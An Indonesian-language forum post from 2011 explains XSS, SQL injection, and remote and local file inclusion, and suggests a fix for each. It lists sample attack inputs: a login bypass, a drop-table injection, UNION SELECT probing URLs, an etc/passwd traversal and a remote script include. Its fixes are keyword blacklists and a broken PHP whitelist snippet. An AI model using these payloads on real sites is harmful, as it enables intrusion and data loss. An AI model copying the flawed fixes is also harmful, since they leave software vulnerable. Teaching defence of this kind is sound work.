Proteksi Website Dari Serangan Hacker (Protecting Website From Common Attacks)

Discussion in 'Internet & Web' started by one2cell, Mar 25, 2011.

  1. one2cell

    one2cell New Member

    Messages:
    294
    Likes Received:
    1,375
    Trophy Points:
    0
    Protecting Website From Common Attacks (Proteksi Website Dari Serangan Hacker)

    [1] Pendahuluan

    Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan
    di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini
    adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
    yang memungkinkan attacker untuk dapat menyusup ke dalam website.

    [2] Cross Site Scripting

    Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman
    web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
    kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna
    dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.

    Example:
    http://www.situs.net/find.php?all=”>

    *Solusi (javascript) :

    function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
    return strTemp;
    }

    [3] SQL Injection

    *\_ Login Form Bypassing

    Berikut adalah contoh kode yang dapat kita bisa bypass:

    index.html file:

    Password:

    login.php file:

    Kita dapat bypass dengan menggunakan ‘ or ’1=1′, dan menjalankan “password = ”or ’1=1”;”.
    Atau attacker dapat juga dapat menghapus database dengan menjalankan “‘ drop table database; –”.

    *Solusi :

    Menggunakan mysql_real_escape_string
    Contoh:

    *\_ Union SQL Injection

    Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya
    di akhir url “sebuah php?.id=”. Jika terdapat error MySQL, situs tersebut kemungkinan besar
    besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
    dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.

    Contoh :

    http://www.situs.net/index.php?id=1′

    salah satu contoh pesan error:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in…..

    Setelah muncul pesan error,maka attacker melanjutkan aksinya [​IMG] )
    http://www.situs.net/index.php?id=1 ORDER BY 1– <– No error.
    http://www.situs.net/index.php?id=1 ORDER BY 2– <– Muncul pesan error. Ini berarti hanya ada satu kolom
    http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()– <– Memilih semua kolom dan menjalankan
    perintah version().

    *Solusi :

    Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:

    $bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)| (--)|(/*)|(select)";
    $patch = eregi_replace($bug, "", $patch);

    [4] File Inclusion

    \_ Remote File Inclusion dan Local File Inclusion

    Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.
    Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
    dengan hanya melalui URL.

    Contoh kode yang vulnerable :

    Beberapa contoh serangan :
    http://www.situs.net/page.php?page=../../../../../ etc/passwd < contoh LFI
    http://www.situs.net/page.php?page=h...vilscript.txt? < contoh RFI

    *Solusi :

    Validate the input.
    $page = $_GET['page'];
    $allowed = array('index.php', 'games.php' 'ip.php');
    $iplogger = ('ip.php');
    if (in_array $page, $pages)) {
    include $page {
    else
    {
    include $iplogger
    die("IP logged.");
    }



    moga aja manfaat tuk pembelajaran.
     

Share This Page